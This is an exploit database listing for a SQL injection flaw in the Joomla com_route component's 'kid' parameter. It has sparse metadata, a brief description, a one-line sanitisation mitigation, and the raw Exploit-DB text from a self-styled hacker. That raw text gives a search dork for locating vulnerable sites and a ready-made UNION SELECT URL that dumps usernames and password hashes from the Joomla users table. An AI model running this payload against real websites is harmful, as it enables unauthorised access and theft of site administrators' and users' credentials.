Joomla com_route&kid Sql Injection Vulnerability

vendor:

com_route

by:

N2n-Hacker

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_route

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla com_route&kid Sql Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. The attacker can use the vulnerable parameter 'kid' in the 'com_route' component of Joomla to inject malicious SQL queries. The attacker can use the UNION operator to retrieve data from the database, such as usernames and passwords.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL query.

Source

Exploit-DB raw data:

#########################################################################
#########################################################################
###                                                                   ###
###             [ Joomla com_route&kid Sql Injection Vulnerability ]  ###
###                                                                   ###
###                       N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr>                ###
###                                                                   ###
###                                                                   ###
#########################################################################
#########################################################################
#                                                                       #
#                                                                       #
# Searching = ---" option=com_route "---                                #
#                                                                       #
#                                                                       #
#  USING =  http://www.site.com/index.php?option=com_route&kid=-35022+  #
#  UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,#
#  13,14,15,16,17,18,19,20,21 FROM JOOMLA USERS--&routing               #
#                                                                       #
#                                                                       #
#           \\\\\\\\\\\\\\\\\\ Activer khfif drif //////////////////    #
#                                                                       #
#########################################################################
#                   My Bad Life But Not For4ver nchallah                #
#########################################################################